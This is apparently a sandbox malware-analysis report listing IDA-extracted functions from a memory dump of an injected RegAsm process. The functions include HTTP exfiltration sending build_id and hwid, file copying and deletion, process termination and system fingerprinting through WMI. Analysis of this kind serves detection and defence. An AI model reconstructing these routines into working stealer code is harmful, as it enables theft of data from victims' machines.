                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2106036038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000513000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000516000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000051C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.00000000005F4000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: H_prolog$lstrcpylstrlen$Sleep
                                                                                                                                                                                                                                                              • String ID: "$ERROR$ERROR$ERROR$ERROR$ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                                                                                                                                                                                                                                                              • API String ID: 1345713276-2213018930
                                                                                                                                                                                                                                                              • Opcode ID: 43269324f860c2ae06b9e27c795a8b236ef888555ccc1246de3ab1475a4c26aa
                                                                                                                                                                                                                                                              • Instruction ID: d01c531e1e47b4cc6a2d22cd096bc4d660d73e225f58ccdc42e790240094469d
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 43269324f860c2ae06b9e27c795a8b236ef888555ccc1246de3ab1475a4c26aa
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 27726070D00248EADB04E7EAC94ABDDBFB8AF15304F1444AEE445B32C2DB785B58D766
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                                              control_flow_graph 2376 403aa8-403b77 _EH_prolog call 40e321 call 403a07 call 40e2ea * 5 call 40e521 InternetOpenA StrCmpCA 2393 403b79 2376->2393 2394 403b7b-403b7e 2376->2394 2393->2394 2395 403b84-403d02 call 40f5de call 40e3ef call 40e3a8 call 40e355 * 2 call 40e463 call 40e3a8 call 40e355 call 40e463 call 40e3a8 call 40e355 call 40e3ef call 40e3a8 call 40e355 call 40e463 call 40e3a8 call 40e355 call 40e463 call 40e3a8 call 40e355 call 40e463 call 40e3ef call 40e3a8 call 40e355 * 2 InternetConnectA 2394->2395 2396 4040d5-404164 InternetCloseHandle call 40f516 * 2 call 40e355 * 8 2394->2396 2395->2396 2467 403d08-403d3b HttpOpenRequestA 2395->2467 2468 403d41-403d43 2467->2468 2469 4040cc-4040cf InternetCloseHandle 2467->2469 2470 403d45-403d55 InternetSetOptionA 2468->2470 2471 403d5b-404066 call 40e463 call 40e3a8 call 40e355 call 40e3ef call 40e3a8 call 40e355 call 40e463 call 40e3a8 call 40e355 call 40e463 call 40e3a8 call 40e355 call 40e463 call 40e3a8 call 40e355 call 40e463 call 40e3a8 call 40e355 call 40e3ef call 40e3a8 call 40e355 call 40e463 call 40e3a8 call 40e355 call 40e463 call 40e3a8 call 40e355 call 40e3ef call 40e3a8 call 40e355 call 40e463 call 40e3a8 call 40e355 call 40e463 call 40e3a8 call 40e355 call 40e463 call 40e3a8 call 40e355 call 40e463 call 40e3a8 call 40e355 call 40e3ef call 40e3a8 call 40e355 call 40e2ea call 40e3ef * 2 call 40e3a8 call 40e355 * 2 call 40e521 lstrlen call 40e521 * 2 lstrlen call 40e521 HttpSendRequestA 2468->2471 2469->2396 2470->2471 2582 4040a2-4040b7 InternetReadFile 2471->2582 2583 404068-40406d 2582->2583 2584 4040b9-4040c7 InternetCloseHandle call 40e355 2582->2584 2583->2584 2586 40406f-40409d call 40e463 call 40e3a8 call 40e355 2583->2586 2584->2469 2586->2582
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • _EH_prolog.MSVCRT ref: 00403AAD
                                                                                                                                                                                                                                                                • Part of subcall function 0040E321: lstrcpy.KERNEL32(00000000,FEF4858D), ref: 0040E347
                                                                                                                                                                                                                                                                • Part of subcall function 00403A07: _EH_prolog.MSVCRT ref: 00403A0C
                                                                                                                                                                                                                                                                • Part of subcall function 00403A07: ??_U@YAPAXI@Z.MSVCRT ref: 00403A3E
                                                                                                                                                                                                                                                                • Part of subcall function 00403A07: ??_U@YAPAXI@Z.MSVCRT ref: 00403A47
                                                                                                                                                                                                                                                                • Part of subcall function 00403A07: ??_U@YAPAXI@Z.MSVCRT ref: 00403A50
                                                                                                                                                                                                                                                                • Part of subcall function 00403A07: lstrlen.KERNEL32(00000000,00000000,?,?,00000000,00000001), ref: 00403A6A
                                                                                                                                                                                                                                                                • Part of subcall function 00403A07: InternetCrackUrlA.WININET(00000000,00000000,?,00000000), ref: 00403A7A
                                                                                                                                                                                                                                                                • Part of subcall function 0040E2EA: lstrcpy.KERNEL32(00000000,00000000), ref: 0040E314
                                                                                                                                                                                                                                                              • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00403B58
                                                                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?), ref: 00403B6F
                                                                                                                                                                                                                                                                • Part of subcall function 0040E3A8: lstrcpy.KERNEL32(00000000,?), ref: 0040E3E1
                                                                                                                                                                                                                                                              • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00403CF7
                                                                                                                                                                                                                                                              • HttpOpenRequestA.WININET(?,?,00000000,00000000,-00400100,00000000), ref: 00403D31
                                                                                                                                                                                                                                                              • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00403D55
                                                                                                                                                                                                                                                                • Part of subcall function 0040E463: _EH_prolog.MSVCRT ref: 0040E468
                                                                                                                                                                                                                                                                • Part of subcall function 0040E463: lstrlen.KERNEL32(?,00000000,00000014,?,?,00415C39,?,?,00424A48,?,00000000,004244C3), ref: 0040E490
                                                                                                                                                                                                                                                                • Part of subcall function 0040E463: lstrcpy.KERNEL32(00000000), ref: 0040E4B7
                                                                                                                                                                                                                                                                • Part of subcall function 0040E463: lstrcat.KERNEL32(?,?), ref: 0040E4C2
                                                                                                                                                                                                                                                                • Part of subcall function 0040E3EF: _EH_prolog.MSVCRT ref: 0040E3F4
                                                                                                                                                                                                                                                                • Part of subcall function 0040E3EF: lstrcpy.KERNEL32(00000000), ref: 0040E440
                                                                                                                                                                                                                                                                • Part of subcall function 0040E3EF: lstrcat.KERNEL32(?,?), ref: 0040E44A
                                                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,004239A5,00000000,?,?,00000000,?,",00000000,?,build_id), ref: 00404031
                                                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 0040404A
                                                                                                                                                                                                                                                              • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 0040405B
                                                                                                                                                                                                                                                              • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 004040AF
                                                                                                                                                                                                                                                              • InternetCloseHandle.WININET(00000000), ref: 004040BA
                                                                                                                                                                                                                                                              • InternetCloseHandle.WININET(?), ref: 004040CF
                                                                                                                                                                                                                                                              • InternetCloseHandle.WININET(?), ref: 004040D8
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2106036038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000513000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000516000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000051C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.00000000005F4000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Internet$lstrcpy$H_prologlstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileOptionReadSend
                                                                                                                                                                                                                                                              • String ID: !$"$"$------$------$------$build_id$hwid
                                                                                                                                                                                                                                                              • API String ID: 1139859944-3346224549
                                                                                                                                                                                                                                                              • Opcode ID: d73f38dbe927608ab9ea402c11925cc2cabc379170bec97884acee1ca15903fb
                                                                                                                                                                                                                                                              • Instruction ID: 489e92a55be8e718c41cf12358fcc240b45c9422e42718dc0d0a46bd63b7c0da
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d73f38dbe927608ab9ea402c11925cc2cabc379170bec97884acee1ca15903fb
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A722517280014CEADB05EBE6C986AEEBFB8AF15304F14446EF501732C2DB781B59DB65
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                                              control_flow_graph 2626 4066f1-406719 _EH_prolog call 40e4fc 2629 406725-406738 call 40e4fc 2626->2629 2630 40671b-406723 2626->2630 2636 4067c9-4067d6 call 40e4fc 2629->2636 2637 40673e 2629->2637 2631 406743 call 40e35e 2630->2631 2635 406748-4067c7 call 40e2ea call 40e463 call 40e3a8 call 40e355 call 40f5de call 40e3ef call 40e3a8 call 40e355 * 2 2631->2635 2668 406816-406832 call 40e521 * 2 CopyFileA 2635->2668 2636->2635 2643 4067dc-4067f8 call 40e355 * 2 2636->2643 2637->2631 2653 406d8a-406daa call 40e355 call 4010d8 2643->2653 2673 406834-40685f call 40e2ea call 40e463 2668->2673 2674 4067fd-40680e call 40e321 call 40fad8 2668->2674 2683 406865-4068f3 call 40e3a8 call 40e355 call 40e463 call 40e3a8 call 40e355 call 40e3ef call 40e3a8 call 40e355 call 40e463 call 40e3a8 2673->2683 2684 4068f8-4069cc call 40e3a8 call 40e355 call 40e463 call 40e3a8 call 40e355 call 40e3ef call 40e3a8 call 40e355 call 40e463 call 40e3a8 call 40e355 call 40e3ef call 40e463 call 40e3a8 call 40e355 2673->2684 2681 406813 2674->2681 2681->2668 2725 4069cf-4069ef call 40e355 call 40e521 2683->2725 2684->2725 2738 4069f5-406a10 2725->2738 2739 406d38-406d4a call 40e521 DeleteFileA call 40e4db 2725->2739 2746 406d24-406d37 2738->2746 2747 406a16-406a2c GetProcessHeap RtlAllocateHeap 2738->2747 2750 406d4f-406d87 call 40e4db call 40e355 * 4 2739->2750 2746->2739 2749 406ca0-406cad 2747->2749 2757 406a31-406ade call 40e2ea * 6 call 40e4fc 2749->2757 2758 406cb3-406cbf lstrlen 2749->2758 2750->2653 2795 406ae0-406ae6 2757->2795 2796 406ae8 2757->2796 2760 406cc1-406cff lstrlen call 40e321 call 401128 call 412f70 2758->2760 2761 406d15-406d21 memset 2758->2761 2777 406d04-406d10 call 40e355 2760->2777 2761->2746 2777->2761 2797 406aee-406b05 call 40e35e call 40e4fc 2795->2797 2796->2797 2802 406b07-406b0d 2797->2802 2803 406b0f 2797->2803 2804 406b15-406b26 call 40e35e call 40e515 2802->2804 2803->2804 2809 406b35-406c9b call 40e521 lstrcat * 2 call 40e521 lstrcat * 2 call 40e521 lstrcat * 2 call 40e521 lstrcat * 2 call 40e521 lstrcat * 2 call 40e521 lstrcat * 2 call 40635e call 40e521 lstrcat call 40e355 lstrcat call 40e355 * 6 2804->2809 2810 406b28-406b30 call 40e35e 2804->2810 2809->2749 2810->2809
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • _EH_prolog.MSVCRT ref: 004066F6
                                                                                                                                                                                                                                                                • Part of subcall function 0040E4FC: StrCmpCA.SHLWAPI(?,00406717,?,00406717,00000000), ref: 0040E505
                                                                                                                                                                                                                                                              • CopyFileA.KERNEL32(00000000,00000000,00000001,00000000,?,00000000,00000000,?,00423B7F,00000000), ref: 0040682A
                                                                                                                                                                                                                                                                • Part of subcall function 0040E321: lstrcpy.KERNEL32(00000000,FEF4858D), ref: 0040E347
                                                                                                                                                                                                                                                                • Part of subcall function 0040FAD8: _EH_prolog.MSVCRT ref: 0040FADD
                                                                                                                                                                                                                                                                • Part of subcall function 0040FAD8: memset.MSVCRT ref: 0040FAFF
                                                                                                                                                                                                                                                                • Part of subcall function 0040FAD8: OpenProcess.KERNEL32(00001001,00000000,?,?,00000000), ref: 0040FB86
                                                                                                                                                                                                                                                                • Part of subcall function 0040FAD8: TerminateProcess.KERNEL32(00000000,00000000), ref: 0040FB94
                                                                                                                                                                                                                                                                • Part of subcall function 0040FAD8: CloseHandle.KERNEL32(00000000), ref: 0040FB9B
                                                                                                                                                                                                                                                                • Part of subcall function 0040E463: _EH_prolog.MSVCRT ref: 0040E468
                                                                                                                                                                                                                                                                • Part of subcall function 0040E463: lstrlen.KERNEL32(?,00000000,00000014,?,?,00415C39,?,?,00424A48,?,00000000,004244C3), ref: 0040E490
                                                                                                                                                                                                                                                                • Part of subcall function 0040E463: lstrcpy.KERNEL32(00000000), ref: 0040E4B7
                                                                                                                                                                                                                                                                • Part of subcall function 0040E463: lstrcat.KERNEL32(?,?), ref: 0040E4C2
                                                                                                                                                                                                                                                                • Part of subcall function 0040E3A8: lstrcpy.KERNEL32(00000000,?), ref: 0040E3E1
                                                                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,000F423F), ref: 00406A1C
                                                                                                                                                                                                                                                              • RtlAllocateHeap.NTDLL(00000000), ref: 00406A23
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,00000000), ref: 00406B41
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,00423BBC), ref: 00406B4F
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,00000000), ref: 00406B61
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,00423BC0), ref: 00406B6F
                                                                                                                                                                                                                                                              • lstrlen.KERNEL32(?), ref: 00406CB6
                                                                                                                                                                                                                                                              • lstrlen.KERNEL32(?), ref: 00406CC4
                                                                                                                                                                                                                                                                • Part of subcall function 00401128: _EH_prolog.MSVCRT ref: 0040112D
                                                                                                                                                                                                                                                                • Part of subcall function 00412F70: _EH_prolog.MSVCRT ref: 00412F75
                                                                                                                                                                                                                                                                • Part of subcall function 00412F70: CreateThread.KERNEL32(00000000,00000000,00411D72,?,00000000,00000000), ref: 0041301B
                                                                                                                                                                                                                                                                • Part of subcall function 00412F70: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000000), ref: 00413023
                                                                                                                                                                                                                                                              • memset.MSVCRT ref: 00406D1C
                                                                                                                                                                                                                                                              • DeleteFileA.KERNEL32(00000000), ref: 00406D41
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2106036038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000513000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000516000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000051C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.00000000005F4000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: H_prologlstrcat$Processlstrcpylstrlen$FileHeapmemset$AllocateCloseCopyCreateDeleteHandleObjectOpenSingleTerminateThreadWait
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 36237839-0
                                                                                                                                                                                                                                                              • Opcode ID: 8bf1e23e095b9cb6b632fcb1a1e4078704d330192dba237c037de93d086178dc
                                                                                                                                                                                                                                                              • Instruction ID: b1f6e28383e3fff9692a0d78c5777136586142c3e79fd42dd068571671610143
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8bf1e23e095b9cb6b632fcb1a1e4078704d330192dba237c037de93d086178dc
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: BE122C71800148EADF05EBA6DD46AEDBB79AF14308F14446EF402731D2EF782B29DB65
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • _EH_prolog.MSVCRT ref: 0040F247
                                                                                                                                                                                                                                                              • CoInitializeEx.OLE32(00000000,00000000,?,?,?,?,?,?,0042451C,00000000,?,Work Dir: In memory,00000000,?,00424504,00000000), ref: 0040F257
                                                                                                                                                                                                                                                              • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,?,0042451C), ref: 0040F268
                                                                                                                                                                                                                                                              • CoCreateInstance.OLE32(00424EE8,00000000,00000001,00424E18,?,?,?,?,?,?,?,0042451C,00000000,?,Work Dir: In memory,00000000), ref: 0040F282
                                                                                                                                                                                                                                                              • CoSetProxyBlanket.OLE32(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,?,?,?,?,?,0042451C,00000000), ref: 0040F2B8
                                                                                                                                                                                                                                                              • VariantInit.OLEAUT32(?), ref: 0040F313
                                                                                                                                                                                                                                                                • Part of subcall function 0040F1A8: CoCreateInstance.OLE32(00424C98,00000000,00000001,00424388,00000000,?), ref: 0040F1C8
                                                                                                                                                                                                                                                                • Part of subcall function 0040F1A8: SysAllocString.OLEAUT32(00000000), ref: 0040F1D6
                                                                                                                                                                                                                                                                • Part of subcall function 0040F1A8: _wtoi64.MSVCRT ref: 0040F218
                                                                                                                                                                                                                                                                • Part of subcall function 0040F1A8: SysFreeString.OLEAUT32(?), ref: 0040F22D
                                                                                                                                                                                                                                                                • Part of subcall function 0040F1A8: SysFreeString.OLEAUT32(00000000), ref: 0040F230
                                                                                                                                                                                                                                                              • FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,0042451C,00000000,?,Work Dir: In memory,00000000,?), ref: 0040F34A
                                                                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,?,?,?,?,0042451C,00000000,?,Work Dir: In memory,00000000,?), ref: 0040F356
                                                                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,0042451C,00000000,?,Work Dir: In memory,00000000,?,00424504), ref: 0040F35D
                                                                                                                                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 0040F39F
                                                                                                                                                                                                                                                              • wsprintfA.USER32 ref: 0040F389
                                                                                                                                                                                                                                                                • Part of subcall function 0040E2EA: lstrcpy.KERNEL32(00000000,00000000), ref: 0040E314
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2106036038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000513000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000516000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000051C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.00000000005F4000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: String$AllocCreateFreeHeapInitializeInstanceTimeVariant$BlanketClearFileH_prologInitProcessProxySecuritySystem_wtoi64lstrcpywsprintf
                                                                                                                                                                                                                                                              • String ID: %d/%d/%d %d:%d:%d$InstallDate$ROOT\CIMV2$Select * From Win32_OperatingSystem$Unknown$Unknown$WQL
                                                                                                                                                                                                                                                              • API String ID: 3912155974-2016369993
                                                                                                                                                                                                                                                              • Opcode ID: 480ecd5e6308617b09b7f2bb83f1af69c0fa1306002764de5b093bb9eba1a589
                                                                                                                                                                                                                                                              • Instruction ID: 8d430aa98e8fbb6da78459b6686bb4d7d24871abc0dfaafc268d7e8e302d3495
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 480ecd5e6308617b09b7f2bb83f1af69c0fa1306002764de5b093bb9eba1a589
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 07413B71A01229BBDB20DB96DC49EEF7BBCFF49750F104126F905B6180D7789641CBA4
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • _EH_prolog.MSVCRT ref: 00410269
                                                                                                                                                                                                                                                              • strtok_s.MSVCRT ref: 0041029A
                                                                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,true,?,?,00000104,?,00000104,?,?,00000000), ref: 00410332
                                                                                                                                                                                                                                                                • Part of subcall function 0040E35E: lstrlen.KERNEL32(?,00000000,?,00415304,004244B3,004244B2,00000000,00000000,?,00415CB7), ref: 0040E367
                                                                                                                                                                                                                                                                • Part of subcall function 0040E35E: lstrcpy.KERNEL32(00000000,00000000), ref: 0040E39B
                                                                                                                                                                                                                                                              • lstrcpy.KERNEL32(?,?), ref: 004103E9
                                                                                                                                                                                                                                                              • lstrcpy.KERNEL32(?,00000000), ref: 00410425
                                                                                                                                                                                                                                                              • lstrcpy.KERNEL32(?,00000000), ref: 0041046C
                                                                                                                                                                                                                                                              • lstrcpy.KERNEL32(?,00000000), ref: 004104B3
                                                                                                                                                                                                                                                              • lstrcpy.KERNEL32(?,00000000), ref: 004104FA
                                                                                                                                                                                                                                                              • strtok_s.MSVCRT ref: 0041065D
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2106036038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000513000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000516000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000051C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.00000000005F4000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: lstrcpy$strtok_s$H_prologlstrlen
                                                                                                                                                                                                                                                              • String ID: false$true
                                                                                                                                                                                                                                                              • API String ID: 49562497-2658103896
                                                                                                                                                                                                                                                              • Opcode ID: 54a2990e2d59dcf91e4d715dd7bbc47d23edf88fa0782b74a2da57a780f32233
                                                                                                                                                                                                                                                              • Instruction ID: 089701835500e5426664cf922ef315e2898dfa839799ff91f2ace4a6e9704c40
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 54a2990e2d59dcf91e4d715dd7bbc47d23edf88fa0782b74a2da57a780f32233
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C6C16F71800109AFDF14EFA5DC45EDE77B9AB54308F10446EF415F3292EA38AB89CB65
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • _EH_prolog.MSVCRT ref: 00404EF7
                                                                                                                                                                                                                                                                • Part of subcall function 0040E321: lstrcpy.KERNEL32(00000000,FEF4858D), ref: 0040E347
                                                                                                                                                                                                                                                                • Part of subcall function 00403A07: _EH_prolog.MSVCRT ref: 00403A0C
                                                                                                                                                                                                                                                                • Part of subcall function 00403A07: ??_U@YAPAXI@Z.MSVCRT ref: 00403A3E
                                                                                                                                                                                                                                                                • Part of subcall function 00403A07: ??_U@YAPAXI@Z.MSVCRT ref: 00403A47
                                                                                                                                                                                                                                                                • Part of subcall function 00403A07: ??_U@YAPAXI@Z.MSVCRT ref: 00403A50
                                                                                                                                                                                                                                                                • Part of subcall function 00403A07: lstrlen.KERNEL32(00000000,00000000,?,?,00000000,00000001), ref: 00403A6A
                                                                                                                                                                                                                                                                • Part of subcall function 00403A07: InternetCrackUrlA.WININET(00000000,00000000,?,00000000), ref: 00403A7A
                                                                                                                                                                                                                                                                • Part of subcall function 0040E2EA: lstrcpy.KERNEL32(00000000,00000000), ref: 0040E314
                                                                                                                                                                                                                                                              • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404F5A
                                                                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?), ref: 00404F6E
                                                                                                                                                                                                                                                              • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00404F91
                                                                                                                                                                                                                                                              • HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 00404FC7
                                                                                                                                                                                                                                                              • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00404FEB
                                                                                                                                                                                                                                                              • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00404FF6
                                                                                                                                                                                                                                                              • HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 00405014
                                                                                                                                                                                                                                                              • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 0040509A
                                                                                                                                                                                                                                                              • InternetCloseHandle.WININET(00000000), ref: 004050A5
